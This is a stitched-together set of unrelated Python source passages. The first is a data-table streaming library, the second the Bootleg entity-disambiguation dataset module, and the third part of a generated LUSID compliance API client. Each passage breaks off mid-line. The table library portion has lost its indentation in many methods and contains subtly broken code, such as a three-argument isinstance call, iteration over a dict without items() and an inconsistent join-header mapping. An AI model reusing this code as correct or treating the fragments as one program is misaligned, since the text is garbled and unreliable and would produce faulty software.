			DataColumn (same table) - returns rows where the two columns are equal
			DataColumn (other table) - returns rows where this column value is in the other column
			method - returns rows where method returns true for column value
			collection - returns rows where column value is in the collection
			value - returns rows where column value equals the given value
		'''
		criteria = createColumnFilter(value)
		return DataTableStream((row for row in self.__dataTableStream if criteria(row[self.header])), self.__dataTableStream.headers())
	def set(self, value):
		'''
		sets the items in this column to the given value
		If value is a function then sets each item to the result of calling value on the item
		returns the modified datatable
		'''
		# Rows are merged with "+", so row objects are expected to support
		# dict addition (e.g. AttributeDict from datatable_util).
		if hasattr(value, '__call__'):
			transform = lambda row: row + {self.header: value(row[self.header])}
		else:
			transform = lambda row: row + {self.header: value}
		return DataTableStream((transform(row) for row in self.__dataTableStream), self.__dataTableStream.headers())
	def sizeOfGroups(self):
		# Frequency of each distinct value appearing in the column.
		return Counter(self)
	def __repr__(self):
		return "DataColumnStream(<dataTable>, '%s')" % self.header
	def __str__(self):
		return ','.join(map(str, self))
class DataTableStream(object):
	def __init__(self, rows, headers):
		# rows: iterable of row dicts (may be a one-shot generator);
		# headers: collection of column names for this stream.
		self.__rows = rows
		self.__headers = headers
		# Column views are built on demand and cached per header name.
		self.__columns = KeyParamedDefaultDict(lambda header: DataColumnStream(self, header))
	def __iter__(self):
		'''Gets an iterator over the data rows'''
		# NOTE(review): if __rows is a generator the stream is single-use -
		# a second iteration yields nothing; confirm callers expect that.
		return iter(self.__rows)
def __getitem__(self, index):
'''Gets the index'th row of data'''
if '__iter__' in dir(index):
criteria = lambda i: i in set(index)
elif isinstance(index, slice):
criteria = lambda i: index.start <= i <= index.stop and (i - index.start) % index.step == 0
else:
for i, row in enumerate(self):
if i == index:
return row
return None
return DataTableStream((row for i, row in enumerate(self) if criteria(i)), self.__headers)
	def column(self, header):
		'''Gets the column named 'header' (same as dataTable.<header>)'''
		# Cached: repeated requests for the same header return the same
		# DataColumnStream instance.
		return self.__columns[header]
	def __getattr__(self, header):
		# Missing attributes fall back to column lookup (stream.price etc).
		# NOTE(review): any misspelled attribute silently becomes a column
		# view instead of raising AttributeError - confirm this is intended.
		return self.column(header)
def columns(self):
'''Returns the DataColumn objects associated with this DataTable'''
return [self.column(header) for header in self.__headers]
	def headers(self):
		'''Returns this table's header strings'''
		# Returns the internal collection itself, not a copy.
		return self.__headers
def filter(self, filterFunction):
'''Returns a DataTable containing the lines in self filtered by the given filterFunciton
Accepts either a dictionary of header -> value which does exact matching on the pairs,
or a filter function which takes a dict as input and returns if that row should be included'''
if isinstance(filterFunction, dict):
filters = {k: createColumnFilter(v) for k, v in filterFunction.items()}
criteria = lambda row: all(v(row[k]) for k, v in filters)
else:
criteria = filterFunction
return DataTableStream((row for row in self if criteria(row)), self.__headers)
	def transform(self, transformFunction, newHeaders=None):
		# Map every row through transformFunction; newHeaders describes the
		# resulting columns.
		# NOTE(review): "newHeaders or set()" also replaces an explicitly
		# passed empty header collection with set() - verify that is wanted.
		return DataTableStream((transformFunction(row) for row in self), newHeaders or set())
	def index(self, keyHeaders, leafHeaders=None):
		# Build a Hierarchy keyed by keyHeaders; leaves default to every
		# header that is not used as a key.
		if leafHeaders is None:
			leafHeaders = set(self.headers()).difference(keyHeaders)
		return Hierarchy.fromTable(self, keyHeaders, leafHeaders)
	def __str__(self):
		# Render via the FIXEDWIDTH formatter using the __or__ pipe below.
		return self | FIXEDWIDTH
def __repr__(self):
return 'DataTableStream(<dataTable>)\nHeaders:\n%s' % self.headers()
def augment(self, other):
'''append the rows in other to the rows in this
if the headers don't match between the two instances then it adds blank columns to each with the headers from the other'''
if isinstance(other, DataTableStream, DataTable):
headers = set(self.__headers).union(other.headers())
else:
headers = self.__headers
if isinstance(other, dict):
stream = chain(self, [other])
else:
stream = chain(self, other)
return DataTableStream(({header: row.get(header, None) for header in headers} for row in stream), headers)
def append(self, other):
'''append the rows in the other to the rows in this
requires that the headers match (or that one of self or other be empty)'''
if isinstance(other, dict):
stream = chain(self, [other])
else:
stream = chain(self, other)
return DataTableStream(stream, self.__headers)
def remove(self, other):
'''remove the rows from other that are in self - uses exact match of rows'''
if isinstance(other, dict):
criteria = lambda row: row != other
else:
criteria = lambda row: row not in other
return self.filter(criteria)
	def extend(self, other):
		'''Add columns to the data using the dictionary keys from other as the new headers and their values as fields on each row
		Overwrites existing columns'''
		# other may be a callable (row -> dict of new fields) or a dict whose
		# values are constants or callables applied to the row.  Rows are
		# merged with "+", so row objects must support dict addition
		# (e.g. AttributeDict from datatable_util) - plain dicts do not.
		# NOTE(review): self.transform is called without newHeaders, so the
		# result's header set collapses to set() - verify against callers.
		if hasattr(other, '__call__'):
			transform = lambda row: row + other(row)
		else:
			def transform(row):
				def it():
					for header, value in other.items():
						if hasattr(value, '__call__'):
							yield header, value(row)
						else:
							yield header, value
				return row + dict(it())
		return self.transform(transform)
	def __or__(self, other):
		'''Pipes the data into other
		Calls other with an iterator for the rows in self'''
		# Enables "stream | FIXEDWIDTH" style formatting (see __str__).
		return other(iter(self))
	def exclude(self, other): #not compatible with existing functions
		'''remove column(s) from the data table
		other may be either a header or list of headers,
		or a predicate which takes a header and the set of data in that column'''
		if '__call__' in dir(other):
			# Predicate path: the whole stream is materialized so the
			# predicate can see each column's full value list; columns for
			# which the predicate returns true are dropped.
			data = list(self)
			length = len(data)
			data = {header: [row[header] for row in data] for header in self.__headers}
			data = {header: values for header, values in data.items() if not other(header, values)}
			return DataTableStream(({header: values[i] for header, values in data.items()} for i in range(length)), data.keys())
		# Header path: normalize to a set of header names to drop.
		if other in self.__headers:
			other = {other}
		else:
			other = set(other)
		transform = lambda row: {header: value for header, value in row.items() if header not in other}
		return self.transform(transform, {header for header in self.__headers if header not in other})
def project(self, other): #not compatible with existing functions
'''filter columns in the data table
other may be either a header or list of headers,
or a predicate which takes a header and the set of data in that column'''
if '__call__' in dir(other):
data = list(self)
length = len(data)
data = {header: [row[header] for row in data] for header in self.__headers}
data = {header: values for header, values in data.items() if other(header, values)}
return DataTableStream(({header: values[i] for header, values in data.items()} for i in range(length)), data.keys())
if other in self.__headers:
other = {other}
else:
other = set(other)
transform = lambda row: {header: value for header, value in row.items() if header in other}
return self.transform(transform, {header for header in self.__headers if header in other})
def removeBlankColumns(self):
'''returns a copy of this DataTable with all of the blank columns removed'''
return self.project(lambda header, values: any(values))
def sorted(self, *fields):
def key(row):
return tuple(sortKey(row.get(field, None)) for field in fields)
return DataTable(sorted(self, key=key))
def iterBucket(self, *fields):
copy = self.sorted(*fields)
currentKey = None
currentBucket = []
for data in copy:
key = tuple(data[field] for field in fields)
if currentKey is not None and key != currentKey:
yield currentKey, DataTable(currentBucket)
currentBucket = []
currentKey = key
currentBucket.append(data)
yield currentKey, DataTable(currentBucket)
def sizeOfBuckets(self, *fields):
'''Returns a dict of bucket -> number of items in the bucket'''
return Counter(tuple(row[field] for field in fields) for row in self)
def bucket(self, *fields):
'''Returns a dict of bucket -> DataTable of rows matching that bucket'''
buckets = defaultdict(lambda:[])
for data in self:
key = tuple(data[field] for field in fields)
buckets[key].append(data)
return AttributeDict((key, DataTable(bucket)) for key, bucket in buckets.items())
def filterBucket(self, predicate, *fields):
'''Filter the datatable using an aggregate predicate
fields specifies how the data will be grouped
predicate is a method which takes a bucket of data and returns if the bucket should be included in the result
'''
return DataTableStream(row for key, bucket in self.iterBucket(*fields) if predicate(bucket) for row in bucket)
def join(self, other, joinParams=None, otherFieldPrefix='', joinType=JoinType.LEFT_OUTER_JOIN):
'''
dataTable.join(otherTable, joinParams, otherFieldPrefix='')
returns a new table with rows in the first table joined with rows in the second table, using joinParams to map fields in the first to fields in the second
Parameters:
other - the table to join
joinParams - a dictionary of <field in self> to <field in other>. Defaults to "natural join", merging common headers
otherFieldPrefix - a string to prepend to the fields added from the second table
joinType - the instance of JoinType which indicates if items should be included in one data table which aren't in the other
'''
if joinParams is None:
joinParams = {h: h for h in self.headers() if h in other.headers()}
elif not isinstance(joinParams, dict):
raise Exception("joinParams must be a dictionary of <field in self> to <field in other>")
selfJoinHeaders = list(joinParams.values())
otherJoinHeaders = [joinParams[h] for h in selfJoinHeaders]
newOtherHeaders = {(v if v in joinParams.values() else otherFieldPrefix + v) for v in otherJoinHeaders}
otherBuckets = other.extend(
lambda row: {otherFieldPrefix + v: row[v] for v in other.headers() if v not in otherJoinHeaders}
).project(newOtherHeaders
).bucket(*otherJoinHeaders)
emptyOtherRow = AttributeDict({otherFieldPrefix + v: None for v in other.headers() if v not in otherJoinHeaders})
emptySelfRow = AttributeDict({header: None for header in self.headers() if header not in selfJoinHeaders})
otherKeysSeen = set()
def it():
for row | |
"""Bootleg NED Dataset."""
import logging
import multiprocessing
import os
import re
import shutil
import sys
import time
import traceback
import warnings
from collections import defaultdict
import numpy as np
import torch
import ujson
from emmental.data import EmmentalDataset
from tqdm import tqdm
from bootleg import log_rank_0_debug, log_rank_0_info
from bootleg.layers.alias_to_ent_encoder import AliasEntityTable
from bootleg.symbols.constants import ANCHOR_KEY, PAD_ID, STOP_WORDS
from bootleg.symbols.entity_symbols import EntitySymbols
from bootleg.symbols.kg_symbols import KGSymbols
from bootleg.symbols.type_symbols import TypeSymbols
from bootleg.utils import data_utils, utils
# Silence a known environment warning: some Python builds lack lzma support.
warnings.filterwarnings(
    "ignore",
    message="Could not import the lzma module. Your installed Python is incomplete. "
    "Attempting to use lzma compression will result in a RuntimeError.",
)
# NOTE(review): `message` is a regex matched against the start of the warning
# text, which does not include the "FutureWarning:" class prefix — this filter
# probably never matches as written; confirm the intended warning message.
warnings.filterwarnings(
    "ignore",
    message="FutureWarning: Passing (type, 1) or '1type'*",
)
# Module-level logger for this dataset module.
logger = logging.getLogger(__name__)
# Removes warnings about TOKENIZERS_PARALLELISM
os.environ["TOKENIZERS_PARALLELISM"] = "false"
class InputExample(object):
    """A single training/test example for prediction."""

    # Field order shared by to_dict() and from_dict() for serialization.
    _FIELDS = (
        "sent_idx",
        "subsent_idx",
        "alias_list_pos",
        "alias_to_predict",
        "span",
        "phrase",
        "alias",
        "qid",
        "qid_cnt_mask_score",
    )

    def __init__(
        self,
        sent_idx,
        subsent_idx,
        alias_list_pos,
        alias_to_predict,
        span,
        phrase,
        alias,
        qid,
        qid_cnt_mask_score,
    ):
        """Init InputExample."""
        assert (
            type(sent_idx) is int
        ), f"We need the sentence index is an int. You have {type(sent_idx)}"
        self.sent_idx = int(sent_idx)
        self.subsent_idx = subsent_idx
        self.alias_list_pos = alias_list_pos
        self.alias_to_predict = alias_to_predict
        self.span = span
        self.phrase = phrase
        self.alias = alias
        self.qid = qid
        self.qid_cnt_mask_score = qid_cnt_mask_score

    def to_dict(self):
        """Return a dictionary of the example's fields."""
        return {name: getattr(self, name) for name in self._FIELDS}

    @classmethod
    def from_dict(cls, in_dict):
        """Create an InputExample from a dictionary produced by to_dict()."""
        return cls(*(in_dict[name] for name in cls._FIELDS))
class InputFeatures(object):
    """A single set of features of data."""

    def __init__(
        self,
        alias_idx,
        word_input_ids,
        word_token_type_ids,
        word_attention_mask,
        word_qid_cnt_mask_score,
        gold_eid,
        for_dump_gold_eid,
        gold_cand_K_idx,
        for_dump_gold_cand_K_idx_train,
        alias_list_pos,
        sent_idx,
        subsent_idx,
        guid,
    ):
        """Initialize InputFeature."""
        self.alias_idx = alias_idx
        self.word_input_ids = word_input_ids
        self.word_token_type_ids = word_token_type_ids
        self.word_attention_mask = word_attention_mask
        self.word_qid_cnt_mask_score = word_qid_cnt_mask_score
        self.gold_eid = gold_eid
        self.for_dump_gold_eid = for_dump_gold_eid
        self.gold_cand_K_idx = gold_cand_K_idx
        self.for_dump_gold_cand_K_idx_train = for_dump_gold_cand_K_idx_train
        self.alias_list_pos = alias_list_pos
        self.sent_idx = sent_idx
        self.subsent_idx = subsent_idx
        self.guid = guid

    def to_dict(self):
        """Return dictionary of object."""
        return {
            "alias_idx": self.alias_idx,
            "word_input_ids": self.word_input_ids,
            "word_token_type_ids": self.word_token_type_ids,
            "word_attention_mask": self.word_attention_mask,
            "word_qid_cnt_mask_score": self.word_qid_cnt_mask_score,
            "gold_eid": self.gold_eid,
            "for_dump_gold_eid": self.for_dump_gold_eid,
            "gold_cand_K_idx": self.gold_cand_K_idx,
            "for_dump_gold_cand_K_idx_train": self.for_dump_gold_cand_K_idx_train,
            "alias_list_pos": self.alias_list_pos,
            "sent_idx": self.sent_idx,
            "subsent_idx": self.subsent_idx,
            "guid": self.guid,
        }

    @classmethod
    def from_dict(cls, in_dict):
        """Create object from dictionary produced by to_dict()."""
        return cls(
            in_dict["alias_idx"],
            in_dict["word_input_ids"],
            in_dict["word_token_type_ids"],
            in_dict["word_attention_mask"],
            in_dict["word_qid_cnt_mask_score"],
            in_dict["gold_eid"],
            # Bug fix: this argument was missing, so from_dict() raised a
            # TypeError (12 positional args for 13 parameters) and shifted
            # every later field by one if called.
            in_dict["for_dump_gold_eid"],
            in_dict["gold_cand_K_idx"],
            in_dict["for_dump_gold_cand_K_idx_train"],
            in_dict["alias_list_pos"],
            in_dict["sent_idx"],
            in_dict["subsent_idx"],
            in_dict["guid"],
        )
def extract_context_windows(span, tokens, max_seq_window_len):
    """Extract the left and right context window around a span.

    The window budget is split between the two sides; the side with more
    tokens available absorbs whatever budget the shorter side leaves unused.

    Args:
        span: span (left and right values)
        tokens: tokens
        max_seq_window_len: maximum window length around a span

    Returns: left context, right context
    """
    left, right = span[0], span[1]
    if left < len(tokens) - right:
        # More room on the right: give the left its half first, the right the rest.
        prev_context = tokens[max(0, left - max_seq_window_len // 2):left]
        next_context = tokens[right:right + max_seq_window_len - len(prev_context)]
    else:
        # More room on the left: give the right its half first, the left the rest.
        next_context = tokens[right:right + max_seq_window_len // 2]
        prev_context = tokens[max(0, left - (max_seq_window_len - len(next_context))):left]
    return prev_context, next_context
def get_structural_entity_str(items, max_tok_len, sep_tok):
    """Return sep_tok joined list of items of structural resources.

    Greedily adds items until the whitespace-token length of the joined
    string would exceed ``max_tok_len``, then drops the item that overflowed.

    Args:
        items: list of structural resources
        max_tok_len: maximum token length
        sep_tok: token to separate out resources

    Returns:
        result string, 1 if any items had to be dropped to fit else 0
    """
    i = 1
    over_len = 0
    while True:
        res = f" {sep_tok} " + f" {sep_tok} ".join(items[:i])
        too_long = len(res.split()) > max_tok_len
        if too_long or i > len(items):
            # Bug fix: the original only truncated/flagged when `i < len(items)`,
            # so hitting the limit exactly at the last item (i == len(items))
            # returned an over-length string with over_len still 0.
            if too_long and i <= len(items):
                over_len = 1
                res = f" {sep_tok} " + f" {sep_tok} ".join(items[: max(1, i - 1)])
            break
        i += 1
    return res, over_len
def get_entity_string(
    qid,
    constants,
    entity_symbols,
    kg_symbols,
    type_symbols,
):
    """
    Get string representation of entity.

    For each entity, generates a string that is fed into a language model to
    generate an entity embedding. Returns all tokens that are the title of the
    entity (even if in the description)

    Args:
        qid: QID
        constants: Dict of constants; reads "use_desc", "use_kg", "use_types",
            "max_ent_kg_len", and "max_ent_type_len"
        entity_symbols: entity symbols
        kg_symbols: kg symbols
        type_symbols: type symbols

    Returns: entity string, word indices of title tokens within that string,
        number of types over max length, number of relations over max length
    """
    over_kg_len = 0
    over_type_len = 0
    # The description section is prefixed with [ent_desc] so the title-masking
    # loop below can tell it apart from the type/KG sections.
    desc_str = (
        "[ent_desc] " + entity_symbols.get_desc(qid) if constants["use_desc"] else ""
    )
    title_str = entity_symbols.get_title(qid) if entity_symbols.qid_exists(qid) else ""
    # To encourage mention similarity, we remove the (<type>) from titles
    title_str = re.sub(r"(\(.*\))", r"", title_str).strip()
    # To add kgs, sep by "[ent_kg]" and then truncate to max_ent_kg_len
    # Then merge with description text
    if constants["use_kg"]:
        # Triples stores "relation tail_qid_title" (e.g. "is member of Manchester United" for qid = <NAME>)
        triples = []
        for rel, tail_qids in kg_symbols.get_relations_tails_for_qid(qid).items():
            for tail_q in tail_qids:
                # Skip tails that no longer resolve to a known entity.
                if not entity_symbols.qid_exists(tail_q):
                    continue
                triples.append(rel + " " + entity_symbols.get_title(tail_q))
        kg_str, over_len = get_structural_entity_str(
            triples,
            constants["max_ent_kg_len"],
            "[ent_kg]",
        )
        over_kg_len += over_len
        desc_str = " ".join([kg_str, desc_str])
    # To add types, sep by "[ent_type]" and then truncate to max_type_ent_len
    # Then merge with description text
    if constants["use_types"]:
        type_str, over_len = get_structural_entity_str(
            type_symbols.get_types(qid),
            constants["max_ent_type_len"],
            "[ent_type]",
        )
        over_type_len += over_len
        desc_str = " ".join([type_str, desc_str])
    # Final layout: "<title> [ent_type] ... [ent_kg] ... [ent_desc] ..."
    ent_str = " ".join([title_str, desc_str])
    # Remove double spaces
    ent_split = ent_str.split()
    ent_str = " ".join(ent_split)
    title_spans = []
    if len(title_str) > 0:
        # Find all occurrences of title words in the ent_str (helps if description has abbreviated name)
        # Make sure you don't mask any types or kg relations
        title_pieces = set(title_str.split())
        # to_skip is True from the first [ent_type] token until [ent_desc].
        # NOTE(review): when use_types is False but use_kg is True there is no
        # [ent_type] token, so KG-relation words can still be collected here —
        # confirm whether that is intended.
        to_skip = False
        for e_id, ent_w in enumerate(ent_split):
            if ent_w == "[ent_type]":
                to_skip = True
            if ent_w == "[ent_desc]":
                to_skip = False
            if to_skip:
                continue
            if ent_w in title_pieces and ent_w not in STOP_WORDS:
                title_spans.append(e_id)
        # all_title_occ = re.finditer(f"({title_str})", ent_str)
        # all_spaces = np.array([m.start() for m in re.finditer("\s", ent_str)])
        # for match in all_title_occ:
        #     start_w = np.sum(all_spaces < match.start())
        #     end_w = np.sum(all_spaces <= match.end())
        #     for i in range(start_w, end_w):
        #         title_spans.append(i)
    return ent_str, title_spans, over_type_len, over_kg_len
def create_examples_initializer(constants_dict):
    """Create examples multiprocessing initializer.

    Stores the shared constants in a module-level global so each worker
    process can read them without receiving them with every task.
    """
    global constants_global
    constants_global = constants_dict
def create_examples(
    dataset,
    create_ex_indir,
    create_ex_outdir,
    meta_file,
    data_config,
    dataset_threads,
    use_weak_label,
    split,
    is_bert,
    tokenizer,
):
    """Create examples from the raw input data.

    Counts the input lines, then extracts examples either in-process (one
    worker) or by chunking the input across a multiprocessing pool. The
    output file names and mention counts are saved to ``meta_file`` for the
    next step in the prep pipeline.

    Args:
        dataset: data file to read
        create_ex_indir: temporary directory where input files are stored
        create_ex_outdir: temporary directory to store output files from method
        meta_file: metadata file to save the file names/paths for the next step in prep pipeline
        data_config: data config
        dataset_threads: number of threads
        use_weak_label: whether to use weak labeling or not
        split: data split
        is_bert: is the tokenizer a BERT one
        tokenizer: tokenizer (not used directly in this function)
    """
    start = time.time()
    # Leave CPU headroom: use at most 80% of the machine's cores.
    num_processes = min(dataset_threads, int(0.8 * multiprocessing.cpu_count()))
    qidcnt_file = os.path.join(
        data_config.entity_dir, data_config.entity_map_dir, data_config.qid_cnt_map
    )
    log_rank_0_debug(logger, "Counting lines")
    # Fix: close the dataset file after counting (the original `open(dataset)`
    # handle was never closed).
    with open(dataset) as count_f:
        total_input = sum(1 for _ in count_f)
    # Constants handed to every worker via the pool initializer.
    constants_dict = {
        "is_bert": is_bert,
        "use_weak_label": use_weak_label,
        "split": split,
        "qidcnt_file": qidcnt_file,
        "max_seq_len": data_config.max_seq_len,
        "max_seq_window_len": data_config.max_seq_window_len,
    }
    if num_processes == 1:
        out_file_name = os.path.join(create_ex_outdir, os.path.basename(dataset))
        res = create_examples_single(
            in_file_idx=0,
            in_file_name=dataset,
            in_file_lines=total_input,
            out_file_name=out_file_name,
            constants_dict=constants_dict,
        )
        files_and_counts = {}
        total_output = res["total_lines"]
        files_and_counts[res["output_filename"]] = res["total_lines"]
    else:
        log_rank_0_info(
            logger, f"Starting to extract examples using {num_processes} processes"
        )
        chunk_input = int(np.ceil(total_input / num_processes))
        log_rank_0_debug(
            logger,
            f"Chunking up {total_input} lines into subfiles of size {chunk_input} lines",
        )
        total_input_from_chunks, input_files_dict = utils.chunk_file(
            dataset, create_ex_indir, chunk_input
        )
        input_files = list(input_files_dict.keys())
        input_file_lines = [input_files_dict[k] for k in input_files]
        output_files = [
            in_file_name.replace(create_ex_indir, create_ex_outdir)
            for in_file_name in input_files
        ]
        assert (
            total_input == total_input_from_chunks
        ), f"Lengths of files {total_input} doesn't match {total_input_from_chunks}"  # fix: "mathc" typo
        log_rank_0_debug(logger, "Done chunking files. Starting pool.")
        pool = multiprocessing.Pool(
            processes=num_processes,
            initializer=create_examples_initializer,
            initargs=[
                constants_dict,
            ],
        )
        total_output = 0
        input_args = list(
            zip(
                list(range(len(input_files))),
                input_files,
                input_file_lines,
                output_files,
            )
        )
        # Store output files and counts for saving in next step
        files_and_counts = {}
        for res in pool.imap_unordered(create_examples_hlp, input_args, chunksize=1):
            total_output += res["total_lines"]
            files_and_counts[res["output_filename"]] = res["total_lines"]
        pool.close()
        # Fix: join the pool so worker processes are reaped before returning.
        pool.join()
    utils.dump_json_file(
        meta_file, {"num_mentions": total_output, "files_and_counts": files_and_counts}
    )
    log_rank_0_debug(
        logger,
        f"Done with extracting examples in {time.time() - start}. "
        f"Total lines seen {total_input}. Total lines kept {total_output}.",
    )
    return
def create_examples_hlp(args):
    """Create examples multiprocessing helper.

    Unpacks a single task tuple and delegates to ``create_examples_single``
    using the process-global constants installed by the pool initializer.
    """
    in_file_idx, in_file_name, in_file_lines, out_file_name = args
    return create_examples_single(
        in_file_idx, in_file_name, in_file_lines, out_file_name, constants_global
    )
def create_examples_single(
in_file_idx,
in_file_name,
in_file_lines,
out_file_name,
constants_dict,
):
"""Create examples."""
split = constants_dict["split"]
max_seq_window_len = constants_dict["max_seq_window_len"]
use_weak_label = constants_dict["use_weak_label"]
qidcnt_file = constants_dict["qidcnt_file"]
qid2cnt = {}
quantile_buckets = [float(i / 100) for i in list(range(0, 101, 5))]
# If not qid2cnt, the quantile_bucket will be 100
quants = np.array([-1 for _ in quantile_buckets])
quants[-1] = 0
if os.path.exists(qidcnt_file):
qid2cnt = ujson.load(open(qidcnt_file))
quants = np.quantile(list(qid2cnt.values()), quantile_buckets)
with open(out_file_name, "w", encoding="utf-8") as out_f:
total_subsents = 0
total_lines = | |
_preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ComplianceRun, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'is_pre_trade',
'recipe_id_scope',
'recipe_id_code',
'by_taxlots'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method run_compliance" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'is_pre_trade' is set
if self.api_client.client_side_validation and ('is_pre_trade' not in local_var_params or # noqa: E501
local_var_params['is_pre_trade'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `is_pre_trade` when calling `run_compliance`") # noqa: E501
# verify the required parameter 'recipe_id_scope' is set
if self.api_client.client_side_validation and ('recipe_id_scope' not in local_var_params or # noqa: E501
local_var_params['recipe_id_scope'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `recipe_id_scope` when calling `run_compliance`") # noqa: E501
if self.api_client.client_side_validation and ('recipe_id_scope' in local_var_params and # noqa: E501
len(local_var_params['recipe_id_scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_scope` when calling `run_compliance`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('recipe_id_scope' in local_var_params and # noqa: E501
len(local_var_params['recipe_id_scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_scope` when calling `run_compliance`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'recipe_id_scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['recipe_id_scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_scope` when calling `run_compliance`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('recipe_id_code' in local_var_params and # noqa: E501
len(local_var_params['recipe_id_code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_code` when calling `run_compliance`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('recipe_id_code' in local_var_params and # noqa: E501
len(local_var_params['recipe_id_code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_code` when calling `run_compliance`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'recipe_id_code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['recipe_id_code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_code` when calling `run_compliance`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_pre_trade' in local_var_params and local_var_params['is_pre_trade'] is not None: # noqa: E501
query_params.append(('isPreTrade', local_var_params['is_pre_trade'])) # noqa: E501
if 'recipe_id_scope' in local_var_params and local_var_params['recipe_id_scope'] is not None: # noqa: E501
query_params.append(('recipeIdScope', local_var_params['recipe_id_scope'])) # noqa: E501
if 'recipe_id_code' in local_var_params and local_var_params['recipe_id_code'] is not None: # noqa: E501
query_params.append(('recipeIdCode', local_var_params['recipe_id_code'])) # noqa: E501
if 'by_taxlots' in local_var_params and local_var_params['by_taxlots'] is not None: # noqa: E501
query_params.append(('byTaxlots', local_var_params['by_taxlots'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ComplianceRun",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/compliance/runs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def run_compliance_check(self, file_name, **kwargs): # noqa: E501
"""[EXPERIMENTAL] RunComplianceCheck: Kick off the compliance check process -- DEPRECATING - POST TRADE ONLY # noqa: E501
Use this endpoint to fetch the start a compliance run, based on a pre-set mapping file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.run_compliance_check(file_name, async_req=True)
>>> result = thread.get()
:param file_name: The name of compliance mappings file to use. Has to exist in drive ComplianceRules folder (required)
:type file_name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ComplianceRun
"""
kwargs['_return_http_data_only'] = True
return self.run_compliance_check_with_http_info(file_name, **kwargs) # noqa: E501
def run_compliance_check_with_http_info(self, file_name, **kwargs): # noqa: E501
"""[EXPERIMENTAL] RunComplianceCheck: Kick off the compliance check process -- DEPRECATING - POST TRADE ONLY # noqa: E501
Use this endpoint to fetch the start a compliance run, based on a pre-set mapping file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.run_compliance_check_with_http_info(file_name, async_req=True)
>>> result = thread.get()
:param file_name: The name of compliance mappings file to use. Has to exist in drive ComplianceRules folder (required)
:type file_name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ComplianceRun, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'file_name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method run_compliance_check" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'file_name' is set
if self.api_client.client_side_validation and ('file_name' not in local_var_params or # noqa: E501
local_var_params['file_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `file_name` when calling `run_compliance_check`") # noqa: E501
if self.api_client.client_side_validation and ('file_name' in local_var_params and # noqa: E501
len(local_var_params['file_name']) > 50): # noqa: E501
raise ApiValueError("Invalid value for parameter `file_name` when calling `run_compliance_check`, length must be less than or equal to `50`") # noqa: E501
if self.api_client.client_side_validation and ('file_name' in local_var_params and # noqa: E501
